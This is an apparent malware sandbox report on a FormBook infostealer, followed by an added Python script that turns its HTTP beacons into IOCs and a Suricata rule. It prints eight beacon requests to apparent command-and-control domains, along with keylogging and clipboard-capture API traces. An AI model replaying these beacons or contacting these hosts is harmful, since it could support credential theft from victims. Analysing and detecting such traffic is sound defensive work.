          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: unknown | DNS traffic detected: queries for: www.othersidewear.com
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001ED7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,6_2_001ED7A1
          Source: global traffic | HTTP traffic detected: GET /hesf/?jBZ=szcn2kpEQ6L2Syu9mG2pKozAyrZLMpz3ThmLak2r9KpoKfLz6EjH9XrJVzpw+e6nWP1B&Gvw=T4RpitPpFtBLx HTTP/1.1 | Host: www.othersidewear.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /hesf/?jBZ=d2AGz1H3YsI9kghQJOJ7DZyuiCPgqoB+sSxuqf6m27exoGivXrHz5sUA11+t0RjRixK2&Gvw=T4RpitPpFtBLx HTTP/1.1 | Host: www.91fulizifen.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /hesf/?jBZ=rBBm79yWj/0scTu35nBTjefHB3yHFR/9uN8IXoi0DRbgMbd2cnMvsZYXFupsHQ3mqy7J&Gvw=T4RpitPpFtBLx HTTP/1.1 | Host: www.shayun.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /hesf/?jBZ=Zexu6rzcFbxF4r/yRE1P6uhuDniKqQl2K3Z2GVMnXCfVfpJX9615KGPJ2pRkkggZfWm9&Gvw=T4RpitPpFtBLx HTTP/1.1 | Host: www.brownkrosshui.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /hesf/?jBZ=p36eIKN5Lwa/8BGKFMSG6AYkxDDJkwu9kGEjCpPHv7kROoaFrm0HZc0Jy9RwJeFaeZw5&Gvw=T4RpitPpFtBLx HTTP/1.1 | Host: www.usbulletinnow.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /hesf/?jBZ=bZ0cL2W3356ZdQMSZx0hbFAlBxxbFCW9aXPVjCHIIl88pIGO5acXFwKQ6PqG5/DWthgZ&Gvw=T4RpitPpFtBLx HTTP/1.1 | Host: www.im-newbie-journal.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /hesf/?jBZ=C6m+T/QSDYRxkia6wo2b10sg9WxaAAR9Ewn+rwYRRUW3VljC+LgrolCw9oI9hSyVjjh+&Gvw=T4RpitPpFtBLx HTTP/1.1 | Host: www.tygyro.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /hesf/?jBZ=Yl+PPX/Fw39a2JSf74vYq4wd93NvWGX3Wu4/ealva/bJOpk7yrAe/vXYfNyLtgAB6gnO&Gvw=T4RpitPpFtBLx HTTP/1.1 | Host: www.87b52.club | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Fri, 06 Oct 2023 13:47:05 GMT | Content-Type: text/html | Content-Length: 673 | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 73 68 61 79 75 6e 2e 6e 65 74 2f 68 65 73 66 2f 3f 6a 42 5a 3d 72 42 42 6d 37 39 79 57 6a 2f 30 73 63 54 75 33 35 6e 42 54 6a 65 66 48 42 33 79 48 46 52 2f 39 75 4e 38 49 58 6f 69 30 44 52 62 67 4d 62 64 32 63 6e 4d 76 73 5a 59 58 46 75 70 73 48 51 33 6d 71 79 37 4a 26 61 6d 70 3b 47 76 77 3d 54 34 52 70 69 74 50 70 46 74 42 4c 78 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 69 7a 6a 36 63 64 77 37 33 6f 71 39 37 32 73 39 73 37 78 6a 68 78 7a 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 33 2f 31 30 2f 30 36 20 32 31 3a 34 37 3a 30 35 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 32 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.shayun.net/hesf/?jBZ=rBBm79yWj/0scTu35nBTjefHB3yHFR/9uN8IXoi0DRbgMbd2cnMvsZYXFupsHQ3mqy7J&amp;Gvw=T4RpitPpFtBLx</td></tr><tr><td>Server:</td><td>izj6cdw73oq972s9s7xjhxz</td></tr><tr><td>Date:</td><td>2023/10/06 21:47:05</td></tr></table><hr/>Powered by Tengine/2.3.2<hr><center>tengine</center></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Fri, 06 Oct 2023 13:48:48 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Server: nginx | Vary: Accept-Encoding | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (10 occurrences)
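          The eight GET requests above share one URI path (/hesf/) and one parameter layout: jBZ carries a different base64-like blob per request and Gvw keeps the same value on every host. That is the shape an analyst extracts IOCs from. The Python below is an added example, not part of the Joe Sandbox report: it parses the request lines exactly as they appear in this report (the extraction ran the request line and the Host and Connection headers together), separates the constant parameter from the per-request one, and emits a Suricata rule for the pattern. The request lines are copied from this report; the reading of the parameters and the rule text, including its placeholder sid, are this example's own assumptions. One caveat a reader should keep: FormBook's documented behaviour is to beacon to a list of candidate domains of which most are decoys, so the two 403 responses above (one from a Tengine front end, one from nginx) do not by themselves say which of the eight hosts, if any, is the live C2.

```python
"""Parse FormBook-style HTTP beacons out of sandbox report lines and derive IOCs.

Added example for this report; not Joe Sandbox code. The request lines are
copied from the report as extracted; the parameter reading and the Suricata
rule layout (with a placeholder sid) are assumptions of this example.
"""
import re
from collections import Counter

# Request lines copied from the report (constructed input list for this example).
REPORT_LINES = [
    "Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=szcn2kpEQ6L2Syu9mG2pKozAyrZLMpz3ThmLak2r9KpoKfLz6EjH9XrJVzpw+e6nWP1B&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.othersidewear.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:",
    "Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=d2AGz1H3YsI9kghQJOJ7DZyuiCPgqoB+sSxuqf6m27exoGivXrHz5sUA11+t0RjRixK2&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.91fulizifen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:",
    "Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=rBBm79yWj/0scTu35nBTjefHB3yHFR/9uN8IXoi0DRbgMbd2cnMvsZYXFupsHQ3mqy7J&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.shayun.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:",
    "Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=Zexu6rzcFbxF4r/yRE1P6uhuDniKqQl2K3Z2GVMnXCfVfpJX9615KGPJ2pRkkggZfWm9&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.brownkrosshui.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:",
    "Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=p36eIKN5Lwa/8BGKFMSG6AYkxDDJkwu9kGEjCpPHv7kROoaFrm0HZc0Jy9RwJeFaeZw5&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.usbulletinnow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:",
    "Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=bZ0cL2W3356ZdQMSZx0hbFAlBxxbFCW9aXPVjCHIIl88pIGO5acXFwKQ6PqG5/DWthgZ&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.im-newbie-journal.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:",
    "Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=C6m+T/QSDYRxkia6wo2b10sg9WxaAAR9Ewn+rwYRRUW3VljC+LgrolCw9oI9hSyVjjh+&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.tygyro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:",
    "Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=Yl+PPX/Fw39a2JSf74vYq4wd93NvWGX3Wu4/ealva/bJOpk7yrAe/vXYfNyLtgAB6gnO&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.87b52.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:",
]

# Tolerates both the fused extraction ("HTTP/1.1Host: www.example.comConnection:")
# and a " | " separated rendering of the same line. Hosts are matched lowercase so
# the run-on "Connection:" header does not get swallowed into the host name.
REQUEST_RE = re.compile(
    r"GET (?P<target>\S+) HTTP/1\.[01](?:\s*\|\s*)?Host: (?P<host>[a-z0-9.-]+)"
)


def parse_request(line):
    """Return {'host', 'path', 'params'} for a GET beacon line, or None if no request."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    # Split the query by hand: urllib's parse_qsl would turn '+' into ' ' and
    # corrupt the base64-like jBZ value.
    params = [tuple(p.split("=", 1)) if "=" in p else (p, "") for p in query.split("&") if p]
    return {"host": m.group("host"), "path": path, "params": params}


def profile(beacons):
    """Group beacons by (path, parameter names). Inside a group, a parameter whose
    value never changes is campaign-wide and a safe content match; one whose value
    changes on every request carries per-victim or per-beacon data."""
    groups = {}
    for b in beacons:
        key = (b["path"], tuple(name for name, _ in b["params"]))
        groups.setdefault(key, []).append(b)
    profiles = []
    for (path, names), items in groups.items():
        seen = {n: Counter() for n in names}
        for it in items:
            for n, v in it["params"]:
                seen[n][v] += 1
        # A value is only "constant" when it repeated across more than one request.
        constant = {n: next(iter(c)) for n, c in seen.items() if len(c) == 1 and len(items) > 1}
        profiles.append({
            "path": path,
            "hosts": sorted({it["host"] for it in items}),
            "requests": len(items),
            "constant": constant,
            "variable": [n for n in names if n not in constant],
        })
    return profiles


def suricata_rule(prof, sid):
    """Suricata (5.x sticky-buffer syntax) rule for one profile. Anchors on the
    path plus first variable parameter name and on the constant name=value pair,
    never on the per-request blob. sid is a placeholder the deployer must assign."""
    if not prof["variable"] or not prof["constant"]:
        raise ValueError("profile has no constant/variable split to anchor on")
    first = prof["variable"][0]
    name, value = next(iter(prof["constant"].items()))
    return (
        'alert http $HOME_NET any -> $EXTERNAL_NET any ('
        f'msg:"FormBook-style beacon {prof["path"]}"; flow:established,to_server; '
        'http.method; content:"GET"; '
        f'http.uri; content:"{prof["path"]}?{first}="; startswith; '
        f'http.uri; content:"{name}={value}"; '
        f'classtype:trojan-activity; sid:{sid}; rev:1;)'
    )


def report_iocs(lines):
    """Parse every request line and return (beacons, profiles)."""
    beacons = [b for b in map(parse_request, lines) if b]
    return beacons, profile(beacons)


if __name__ == "__main__":
    beacons, profs = report_iocs(REPORT_LINES)
    for sid, p in enumerate(profs, start=1000001):
        print(f"{p['requests']} requests to {len(p['hosts'])} hosts, path {p['path']}, "
              f"constant {p['constant']}, per-request {p['variable']}")
        print("hosts:", ", ".join(p["hosts"]))
        print(suricata_rule(p, sid=sid))
```

          The rule deliberately matches on the fixed prefix and the constant Gvw pair rather than on any host name, because the host list is what the operator rotates between campaigns while the URI scheme is what the builder bakes in.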

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001EF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_001EF6C7
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001DA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,6_2_001DA54A
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001EF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_001EF45C
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00209ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_00209ED5

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.3875577794.00000000106B5000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: ewdbwwfpdh.bmp PID: 6052, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: RegSvcs.exe PID: 6108, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: cmd.exe PID: 636, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
